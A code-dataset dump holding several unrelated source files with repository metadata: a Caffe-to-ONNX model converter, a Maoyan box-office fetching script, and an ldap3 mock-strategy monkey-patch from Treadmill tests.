# subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT,
# account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER,
# is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0,
# is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0,
# is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0,
# is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0,
# cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0,
# is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0,
# other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0,
# share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0,
# message_source INTEGER DEFAULT 0)')
| 46.46875
| 139
| 0.496824
|
de8e378e9f6b59dcf521f5669f093920895a448f
| 28,696
|
py
|
Python
|
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | null | null | null |
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | null | null | null |
caffe2onnx/src/caffe2onnx.py
|
kumardesappan/caffe2onnx
|
b7e73feed3bbc5ddbdf25b87af93a2bae596055d
|
[
"BSD-3-Clause"
] | 1
|
2022-01-20T05:18:29.000Z
|
2022-01-20T05:18:29.000Z
|
import copy
import numpy as np
from onnx import helper
import onnx
from . import OPs as op
from .c2oObject import *
from .op_layer_info import *
class Caffe2Onnx():
def __init__(self,net,model,onnxname):
# Initialize a c2oGraph object
self.onnxmodel = c2oGraph(onnxname)
# Network and parameters
self._NetLayer = self.__getNetLayer(net)
self._ModelLayer = self.__getModelLayer(model)
# Model input name and input dimension
self.model_input_name = []
self.model_input_shape = []
# Node list
self.__n = 0
self.NodeList = []
# Get layer list
LayerList = self.__addInputsTVIandGetLayerList(net)
self.__getNodeList(LayerList)
self.__addOutputsTVIandValueInfo()
# Get the network layer
def __getNetLayer(self,net):
if len(net.layer)==0 and len(net.layers)!=0:
return net.layers
elif len(net.layer)!=0 and len(net.layers)==0:
return net.layer
else:
print("prototxt layer error")
return -1
# Get parameter layer
def __getModelLayer(self,model):
if len(model.layer) == 0 and len(model.layers) != 0:
return model.layers
elif len(model.layer) != 0 and len(model.layers) == 0:
return model.layer
else:
print("caffemodel layer error")
return -1
# Add model input information to Inputs and get a list of subsequent layers
def __addInputsTVIandGetLayerList(self,net):
# If the type of the first layer is Input, and no net.input exists
if net.input == [] and self._NetLayer[0].type == "Input":
layer_list = []
# Considering that the entire network will have multiple inputs
for lay in self._NetLayer:
if lay.type == "Input":
in_tvi = helper.make_tensor_value_info(lay.name+"_input", TensorProto.FLOAT, lay.input_param.shape[0].dim)
self.model_input_name.append(lay.name+"_input")
self.model_input_shape.append(lay.input_param.shape[0].dim)
self.onnxmodel.addInputsTVI(in_tvi)
print("add model input information")
else:
layer_list.append(lay)
return layer_list
# If net.input exists
elif net.input !=[]:
if bool(net.input_dim):
input_dim = net.input_dim
elif bool(net.input_shape):
input_dim = net.input_shape[0].dim
else:
raise RuntimeError("Input shape missing!")
in_tvi = helper.make_tensor_value_info("input", TensorProto.FLOAT, input_dim)
self.model_input_name.append("input")
self.model_input_shape.append(input_dim)
self.onnxmodel.addInputsTVI(in_tvi)
print("add model input information")
return self._NetLayer
# None of the above situations, then the caffe model has no input, there is a problem
else:
raise ValueError("the caffe model has no input")
# Get the parameter shape of layer
def __getParamsShapeandData(self, layer):
ParamShape = []
ParamData = []
# According to the layer name, find out the parameters in the corresponding caffemodel
for model_layer in self._ModelLayer:
if layer.name == model_layer.name:
Params = copy.deepcopy(model_layer.blobs)
ParamShape = [p.shape.dim for p in Params]
ParamData = [p.data for p in Params]
if layer.type == "BatchNorm" or layer.type == "BN":
if len(ParamShape) == 3:
# If it is a bn layer, the sliding coefficient of the last layer is not used
ParamShape = ParamShape[:-1]
ParamData = ParamData[:-1]
elif len(ParamShape) == 2 and len(ParamShape[0]) != 1:
ParamShape = [[ParamShape[0][1]], [ParamShape[1][1]]]
ParamData = ParamData
return ParamShape, ParamData
# Add parameters to Inputs and generate tensor storage data
def __addInputsTVIfromParams(self,layer,ParamName,ParamType):
#print(layer.type)
ParamShape = []
ParamData = []
# Find out the parameters in the corresponding caffemodel based on the layer name
for model_layer in self._ModelLayer:
if layer.name == model_layer.name:
Params = copy.deepcopy(model_layer.blobs)
ParamShape = [p.shape.dim for p in Params]
ParamData = [p.data for p in Params]
if layer.type == "BatchNorm" or layer.type == "BN":
if len(ParamShape) == 3:
# If it is bn layer and params is [mean, var, s], you need to divide mean and var by sliding coefficient s
ParamShape = ParamShape[:-1]
ParamData = [[q/(Params[-1].data[0]) for q in p.data] if i==0 else [q/(Params[-1].data[0] + 1e-5) for q in p.data] for i,p in enumerate(Params[:-1])] # with s
elif len(ParamShape) == 2 and len(ParamShape[0]) == 4:
ParamShape = [[ParamShape[0][1]], [ParamShape[1][1]]]
ParamData = [[q/1. for q in p.data] if i==0 else [q/(1. + 1e-5) for q in p.data] for i,p in enumerate(Params)]
# comment it for tvm because tvm use broadcast at prelu layer
elif layer.type == "PReLU":
ParamShape = [[ParamShape[0][0], 1, 1]]
break
# Judge whether there is Param
if ParamShape != []:
ParamName = ParamName[0:len(ParamShape)]
ParamType = ParamType[0:len(ParamShape)]
for i in range(len(ParamShape)):
#print(ParamName[i])
ParamName[i] = layer.name+ParamName[i]
p_tvi = helper.make_tensor_value_info(ParamName[i], ParamType[i], ParamShape[i])
p_t = helper.make_tensor(ParamName[i],ParamType[i],ParamShape[i],ParamData[i])
self.onnxmodel.addInputsTVI(p_tvi)
self.onnxmodel.addInitTensor(p_t)
#print("add parameters " + ParamName[i] + " input information and tensor data")
if layer.type == "BatchNorm" or layer.type == "BN" or layer.type == "Scale":
return ParamName, ParamShape
return ParamName
# Manually add parameters to the input information and generate tensor storage data
def __addInputsTVIfromMannul(self,layer,ParamName,ParamType,ParamShape,ParamData):
Param_Name = copy.deepcopy(ParamName)
for i in range(len(ParamShape)):
Param_Name[i] = layer.name + ParamName[i]
p_tvi = helper.make_tensor_value_info(Param_Name[i], ParamType[i], ParamShape[i])
p_t = helper.make_tensor(Param_Name[i], ParamType[i], ParamShape[i], ParamData[i])
self.onnxmodel.addInputsTVI(p_tvi)
self.onnxmodel.addInitTensor(p_t)
#print("add parameters " + Param_Name[i] + " input information and tensor data")
return Param_Name
# Get the output name of the previous layer (that is, the input of the current layer)
def __getLastLayerOutNameAndShape(self,layer):
outname = []
outshape = []
# If the node list is empty, or the bottom of the current layer is in input_name, the input of the previous layer must be Input
if self.NodeList == []:
outname += self.model_input_name
outshape += self.model_input_shape
else:
for i in range(len(layer.bottom)):
for j in range(len(self.model_input_name)):
if layer.bottom[i] + '_input' == self.model_input_name[j]:
outname.append(self.model_input_name[j])
outshape.append(self.model_input_shape[j])
# Because prototxt has the same name as top and bottom, but layer.bottom can only correspond to one node, so for each layer.bottom,
# find the last node with the same name as the upper layer node
name = None
shape = None
for node in self.NodeList:
for j in range(len(node.top) if node.node.op_type != "MaxPool" else 1): # comment if statement for original maxpool and maxunpool
if layer.bottom[i] == node.top[j]:
name = node.outputs_name[j]
shape = node.outputs_shape[j]
if name:
outname.append(name)
outshape.append(shape)
#try:
# assert outname, "failed at layer %s, layer's bottom not detected ... "%(layer.name)
#except:
if len(outname) == 0 :
print("layer %s, layer's bottom not detected ... "%(layer.name))
return outname, outshape
# Get the output name of the current layer, ie layername + "_ Y"
def __getCurrentLayerOutName(self,layer):
# return [layer.name+"_Y"]
# Consider the situation with multiple outputs
if layer.top == layer.bottom and len(layer.top) == 1:
return [layer.name+"_Y"]
return [out+"_Y" for out in layer.top]
def __getNodeList(self,Layers):
Layers = [ l for l in Layers if len(l.include) == 0 or l.include[0].phase is None or l.include[0].phase == 1]
#for l in Layers:
# print(l.name)
for i in range(len(Layers)):
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
if len(inname) == 0:
continue
# Convolution
if Layers[i].type == "Convolution" or Layers[i].type == Layer_CONVOLUTION:
# 1. Get node input name, input dimension, output name, node name
if Layers[i].name == "conv4_3_norm_mbox_loc":
import ipdb; ipdb.set_trace()
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
conv_pname = self.__addInputsTVIfromParams(Layers[i],op_pname["Conv"],op_ptype["Conv"])
inname.extend(conv_pname)
# 3. Build conv_node
conv_node = op.createConv(Layers[i],nodename,inname,outname,input_shape)
# 4. Add node to node list
self.NodeList.append(conv_node)
self.__n += 1
# BatchNorm + Scale
elif Layers[i].type == "BatchNorm" or Layers[i].type == "BN":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
if i < len(Layers) - 1 and Layers[i+1].type == "Scale":
scale_pname, scale_pshape = self.__addInputsTVIfromParams(Layers[i + 1], op_pname["Scale"], op_ptype["Scale"])
bn_pname, bn_pshape = self.__addInputsTVIfromParams(Layers[i], op_pname["BatchNorm"], op_ptype["BatchNorm"])
assert bn_pshape == scale_pshape, "BatchNorm and Scale params should share the same shape"
inname.extend(scale_pname)
inname.extend(bn_pname)
else:
bn_pshape, _ = self.__getParamsShapeandData(Layers[i])
custom_params = [np.ones(shape=bn_pshape[0], dtype=np.float), 0.001 + np.zeros(shape=bn_pshape[1], dtype=np.float)]
scale_pname = self.__addInputsTVIfromMannul(Layers[i], op_pname["Scale"], op_ptype["Scale"], bn_pshape, custom_params)
bn_pname, bn_pshape = self.__addInputsTVIfromParams(Layers[i], op_pname["BatchNorm"], op_ptype["BatchNorm"])
inname.extend(scale_pname)
inname.extend(bn_pname)
# 3. Build bn_node
bn_node = op.createBN(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(bn_node)
self.__n += 1
# Pooling
elif Layers[i].type == "Pooling" or Layers[i].type == Layer_POOLING:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build pool_node
pool_node = op.createPooling(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(pool_node)
self.__n += 1
# MaxUnPool
elif Layers[i].type == "MaxUnpool":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build unpool_node
unpool_node = op.createUnPooling(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(unpool_node)
self.__n += 1
# Eltwise
elif Layers[i].type == "Eltwise" or Layers[i].type == Layer_ELTWISE:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Buildeltwise_node
eltwise_node = op.createEltwise(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(eltwise_node)
self.__n += 1
# Softmax
elif Layers[i].type == "Softmax" or Layers[i].type == Layer_SOFTMAX:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Buildsoftmax_node
softmax_node = op.createSoftmax(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(softmax_node)
self.__n += 1
# Relu
elif Layers[i].type == "ReLU" or Layers[i].type == Layer_RELU:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Buildrelu_node
relu_node = op.createRelu(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(relu_node)
self.__n += 1
# LRN
elif Layers[i].type == "LRN" or Layers[i].type == Layer_LRN:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. BuildLRN_node
LRN_node = op.createLRN(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(LRN_node)
self.__n += 1
# Dropout
elif Layers[i].type == "Dropout" or Layers[i].type == Layer_DROPOUT or Layers[i].type == "Permute" or Layers[i].type == "Reshape":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. BuildDropout_node
Dropout_node = op.createDropout(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Dropout_node)
self.__n += 1
elif Layers[i].type == "Flatten":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. BuildDropout_node
Flatten_node = op.createFlatten(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Flatten_node)
self.__n += 1
elif Layers[i].type == "DetectionOutput":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = 'Boxes'
print(nodename, inname, input_shape)
# 2. Boxes
output_shape = [[1,1000,5]]
outname = ["Boxes"]
# Build node
node = c2oNode(Layers[i], nodename, "Concat", inname, outname, input_shape, output_shape, {"axis":1})
# 3. Add nodes to the node list
self.NodeList.append(node)
nodename = 'Labels'
# 4. Lables
output_shape = [[1,1000]]
outname = ["Labels"]
# Build node
node = c2oNode(Layers[i], nodename, "Concat", inname, outname, input_shape, output_shape, {"axis":1})
# 5. Add nodes to the node list
self.NodeList.append(node)
self.__n += 2
#print(nodename, " node construction completed")
# Upsample
elif Layers[i].type == "Upsample" or Layers[i].type == Layer_UPSAMPLE:
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
paramshape = [[4, 1]]
paramdata = [[1.0, 1.0, Layers[i].upsample_param.scale, Layers[i].upsample_param.scale]]
pname = self.__addInputsTVIfromMannul(Layers[i],op_pname["Upsample"],op_ptype["Upsample"],paramshape,paramdata)
inname.extend(pname)
# 3. Build Upsample_node
Upsample_node = op.createUpsample(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(Upsample_node)
self.__n += 1
# Concat
elif Layers[i].type == "Concat" or Layers[i].type == Layer_CONCAT:
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. BuildConcat_node
Concat_node = op.createConcat(Layers[i], nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(Concat_node)
self.__n += 1
# PRelu
elif Layers[i].type == "PReLU":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
pname = self.__addInputsTVIfromParams(Layers[i], op_pname["PRelu"], op_ptype["PRelu"])
inname.extend(pname)
# 3. Build PRelu_node
PRelu_node = op.createPRelu(Layers[i], nodename, inname, outname, input_shape)
# 4. Add node to node list
self.NodeList.append(PRelu_node)
self.__n += 1
# InnerProduct
# Since there is no fully connected layer in onnx, it needs to be split. There are two methods for splitting (Reshape + Gemm, Reshape + MatMul + Add)
elif Layers[i].type == "InnerProduct" or Layers[i].type == Layer_INNER_PRODUCT:
reshape_layer = copy.deepcopy(Layers[i]) # Deep copy
# 1. Get node input name, input dimension, output name, node name
reshape_inname, reshape_input_shape = self.__getLastLayerOutNameAndShape(reshape_layer) # Get reshape input name list and input shape
reshape_outname = [reshape_layer.name + "_Reshape_Y"]
reshape_nodename = reshape_layer.name+"_Reshape"
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
paramshape = [[2]]
paramdata = op.getReshapeOutShape(Layers[i],reshape_input_shape)
reshape_pname = self.__addInputsTVIfromMannul(reshape_layer,op_pname["Reshape"],op_ptype["Reshape"],paramshape,paramdata)
reshape_inname.extend(reshape_pname)
#3. Build reshape_node
reshape_node = op.createReshape(reshape_layer,reshape_nodename, reshape_inname, reshape_outname, reshape_input_shape)
# 4. Add node to node list
self.NodeList.append(reshape_node)
self.__n += 1
# Gemm
gemm_layer = copy.deepcopy(Layers[i]) # Deep copy
# 1. Get node input name, input dimension, output name, node name
gemm_inname = reshape_outname
gemm_input_shape = self.NodeList[self.__n-1].outputs_shape
gemm_outname = [gemm_layer.name+"_Gemm_Y"]
gemm_nodename = gemm_layer.name+"_Gemm"
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
gemm_pname = self.__addInputsTVIfromParams(gemm_layer,op_pname["InnerProduct"],op_ptype["InnerProduct"]) # Obtain input parameters. For add, blobs [1] does not require bias, so directly obtain blobs [0]
gemm_inname.extend(gemm_pname)
#3. Build gemm_node
matmul_node = op.createGemm(gemm_layer, gemm_nodename, gemm_inname, gemm_outname, gemm_input_shape, gemm_layer.inner_product_param.num_output)
# 4. Add node to node list
self.NodeList.append(matmul_node)
self.__n += 1
# Deconvolution
elif Layers[i].type == "Deconvolution":
# 1. Get node input name, input dimension, output name, node name
inname, input_shape = self.__getLastLayerOutNameAndShape(Layers[i])
outname = self.__getCurrentLayerOutName(Layers[i])
nodename = Layers[i].name
# 2. Generate the node parameter tensor value info, and get the node parameter name, add the parameter name to the node input name list
conv_pname = self.__addInputsTVIfromParams(Layers[i], op_pname["ConvTranspose"], op_ptype["ConvTranspose"])
inname.extend(conv_pname)
#3. Build conv_node
conv_node = op.createConvTranspose(Layers[i], nodename, inname, outname, input_shape)
#if self.debug:
# self.__print_debug_info(nodename, inname, outname, input_shape, conv_node.outputs_shape)
# 4. Add node to node list
self.NodeList.append(conv_node)
self.__n += 1
# Softmax
elif Layers[i].type == "ArgMax":
# 1. Get node input name, input dimension, output name, node name
inname,input_shape = self.__getLastLayerOutNameAndShape(Layers[i]) # Get input name list and input shape
outname = self.__getCurrentLayerOutName(Layers[i]) # Get the output name list
nodename = Layers[i].name
# 2. Build argmax_node
argmax_node = op.createArgmax(Layers[i],nodename, inname, outname, input_shape)
# 3. Add nodes to the node list
self.NodeList.append(argmax_node)
self.__n += 1
# Determine whether the current node is an output node
def judgeoutput(self,current_node,nodelist):
for outname in current_node.outputs_name:
for node in nodelist:
if outname in node.inputs_name:
return False
return True
# Add model output information and intermediate node information
def __addOutputsTVIandValueInfo(self):
for i in range(len(self.NodeList)):
out_type = TensorProto.FLOAT
if self.NodeList[i].node.op_type == 'ArgMax':
out_type = TensorProto.INT64
if self.judgeoutput(self.NodeList[i],self.NodeList):# Build output node information
lastnode = self.NodeList[i]
for j in range(len(lastnode.outputs_shape)):
output_tvi = helper.make_tensor_value_info(lastnode.outputs_name[j], out_type,lastnode.outputs_shape[j])
self.onnxmodel.addOutputsTVI(output_tvi)
else:# Build intermediate node information
innernode = self.NodeList[i]
for k in range(len(innernode.outputs_shape)):
hid_out_tvi = helper.make_tensor_value_info(innernode.outputs_name[k], out_type, innernode.outputs_shape[k])
self.onnxmodel.addValueInfoTVI(hid_out_tvi)
print("add model output information and model intermediate output information")
# Create a model
def createOnnxModel(self):
node_def = [Node.node for Node in self.NodeList]
graph_def = helper.make_graph(
node_def,
self.onnxmodel.name,
self.onnxmodel.in_tvi,
self.onnxmodel.out_tvi,
self.onnxmodel.init_t,
value_info=self.onnxmodel.hidden_out_tvi
)
op = onnx.OperatorSetIdProto()
op.version = 9
model_def = helper.make_model(graph_def, producer_name='caffe', opset_imports=[op])
#model_def = helper.make_model(graph_def, producer_name='caffe')
print("*.onnx model conversion completed")
return model_def
| 47.986622
| 219
| 0.58482
|
b5714e6101d4bcd35275a8ce80bf5ba0f8812b29
| 2,099
|
py
|
Python
|
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | 1
|
2019-10-07T02:32:30.000Z
|
2019-10-07T02:32:30.000Z
|
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | null | null | null |
everyday_wechat/control/moviebox/maoyan_movie_box.py
|
filon7/EverydayWechat
|
cf4f509eb570de312995ce5c3b517f369753a1e9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Project: EverydayWechat-Github
Creator: DoubleThunder
Create time: 2019-08-30 12:22
Introduction: 猫眼实时票房 地址:https://piaofang.maoyan.com/dashboard
接口地址:https://box.maoyan.com/promovie/api/box/second.json?beginDate=20190830
"""
import requests
from datetime import datetime
def get_maoyan_movie_box(date='', is_expired=False):
"""
获取特定日期的实时票房日期
https://box.maoyan.com/promovie/api/box/second.json?beginDate=20190830#指定日期的节假日及万年历信息
:param date: str 日期 格式 yyyyMMdd
:param is_expired
:rtype str
"""
date_ = date or datetime.now().strftime('%Y%m%d')
print('获取 {} 的票房数据...'.format(date_))
# try:
resp = requests.get('https://box.maoyan.com/promovie/api/box/second.json?beginDate={}'.format(date_))
if resp.status_code == 200:
# print(resp.text)
content_dict = resp.json()
if content_dict['success']:
data_dict = content_dict['data']
total_box_info = data_dict['totalBoxInfo']
box_list = data_dict['list']
box_info_list = []
for i, r in enumerate(box_list[:10]):
movice_name = r['movieName']
box_info = r['boxInfo']
sumBoxInfo = r['sumBoxInfo']
box_info_list.append('{}.《{}》({}万,累积:{})'.format(str(i + 1), movice_name, box_info, sumBoxInfo))
cur_date = datetime.strptime(date_, '%Y%m%d').strftime('%Y{}%m{}%d{}').format('年', '月', '日')
return_text = "{cur_date} {box_name}\n当日总票房:{total_box_info}万\n{box_info}".format(
cur_date=cur_date,
box_name="实时票房" if is_expired else "当日票房",
total_box_info=total_box_info,
box_info='\n'.join(box_info_list)
)
return return_text
else:
print('获取票房失败:{}'.format(content_dict['msg']))
return None
print('获取票房失败。')
# except Exception as exception:
# print(str(exception))
return None
# __date = '20190831'
# dd = get_maoyan_movice_box(__date, is_expired=False)
# print(dd)
| 32.292308
| 112
| 0.602192
|
0edb29ac5643be7e5af6f0475976201da240b35e
| 7,196
|
py
|
Python
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 133
|
2016-09-15T13:36:12.000Z
|
2021-01-18T06:29:13.000Z
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
vrautela/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 108
|
2016-12-28T23:41:27.000Z
|
2020-03-05T21:20:37.000Z
|
lib/python/treadmill/tests/treadmill_ldap_patch.py
|
evreng/treadmill
|
05e47fa8acdf8bad7af78e737efb26ea6488de82
|
[
"Apache-2.0"
] | 69
|
2016-09-23T20:38:58.000Z
|
2020-11-11T02:31:21.000Z
|
"""Monkey-patch the evaluate_filter_node method of ldap3's MockBaseStrategy.
This function is extracted from ldap3 with a small change in the
`node.tag == MATCH_SUBSTRING` branch. See:
ldap3/strategy/mockBase.py line 822 for ldap3 version 2.3
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import re
from ldap3.strategy import mockBase
from ldap3.strategy.mockBase import (
to_unicode, log, log_enabled, ERROR, LDAPDefinitionError,
SERVER_ENCODING,
ROOT, AND, OR, NOT, MATCH_APPROX,
MATCH_GREATER_OR_EQUAL, MATCH_LESS_OR_EQUAL, MATCH_EXTENSIBLE,
MATCH_PRESENT, MATCH_SUBSTRING, MATCH_EQUAL
)
def monkey_patch():
"""Perform the monkey patching."""
mockBase.MockBaseStrategy.evaluate_filter_node = evaluate_filter_node
# The patched function from ldap3 doesn't follow our conventions
# pylint: disable=too-many-nested-blocks
# pylint: disable=too-many-branches
# pylint: disable=too-many-statements
def evaluate_filter_node(self, node, candidates):
"""After evaluation each 2 sets are added to each MATCH node, one for the
matched object and one for unmatched object. The unmatched object set is
needed if a superior node is a NOT that reverts the evaluation. The BOOLEAN
nodes mix the sets returned by the MATCH nodes"""
node.matched = set()
node.unmatched = set()
if node.elements:
for element in node.elements:
self.evaluate_filter_node(element, candidates)
if node.tag == ROOT:
return node.elements[0].matched
elif node.tag == AND:
for element in node.elements:
if not node.matched:
node.matched.update(element.matched)
else:
node.matched.intersection_update(element.matched)
if not node.unmatched:
node.unmatched.update(element.unmatched)
else:
node.unmatched.intersection_update(element.unmatched)
elif node.tag == OR:
for element in node.elements:
node.matched.update(element.matched)
node.unmatched.update(element.unmatched)
elif node.tag == NOT:
node.matched = node.elements[0].unmatched
node.unmatched = node.elements[0].matched
elif node.tag == MATCH_GREATER_OR_EQUAL:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if value.isdigit() and attr_value.isdigit():
if int(value) >= int(attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
if to_unicode(
value, SERVER_ENCODING
).lower() >= to_unicode(
attr_value, SERVER_ENCODING
).lower(): # case insensitive string comparison
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_LESS_OR_EQUAL:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if value.isdigit() and attr_value.isdigit():
if int(value) <= int(attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
if to_unicode(
value, SERVER_ENCODING
).lower() <= to_unicode(
attr_value, SERVER_ENCODING
).lower(): # case insentive string comparison
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_EXTENSIBLE:
self.connection.last_error =\
'Extensible match not allowed in Mock strategy'
if log_enabled(ERROR):
log(ERROR, '<%s> for <%s>',
self.connection.last_error, self.connection)
raise LDAPDefinitionError(self.connection.last_error)
elif node.tag == MATCH_PRESENT:
attr_name = node.assertion['attr']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_SUBSTRING:
attr_name = node.assertion['attr']
# rebuild the original substring filter
if 'initial' in node.assertion and\
node.assertion['initial'] is not None:
substring_filter = re.escape(
to_unicode(node.assertion['initial'], SERVER_ENCODING)
)
else:
substring_filter = ''
if 'any' in node.assertion and node.assertion['any'] is not None:
for middle in node.assertion['any']:
substring_filter += '.*' + re.escape(
to_unicode(middle, SERVER_ENCODING)
)
if 'final' in node.assertion and node.assertion['final'] is not None:
substring_filter += '.*' + re.escape(
to_unicode(node.assertion['final'], SERVER_ENCODING)
)
# This is the patched condition:
# node.assertion['any'] => node.assertion.get('any', None)
if substring_filter and not node.assertion.get('any', None) and not\
node.assertion.get('final', None): # only initial, adds .*
substring_filter += '.*'
regex_filter = re.compile(
substring_filter, flags=re.UNICODE | re.IGNORECASE
) # unicode AND ignorecase
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate]:
for value in self.connection.server.dit[candidate][attr_name]:
if regex_filter.match(to_unicode(value, SERVER_ENCODING)):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
else:
node.unmatched.add(candidate)
elif node.tag == MATCH_EQUAL or node.tag == MATCH_APPROX:
attr_name = node.assertion['attr']
attr_value = node.assertion['value']
for candidate in candidates:
if attr_name in self.connection.server.dit[candidate] and\
self.equal(candidate, attr_name, attr_value):
node.matched.add(candidate)
else:
node.unmatched.add(candidate)
return None
| 42.329412
| 79
| 0.588938
|
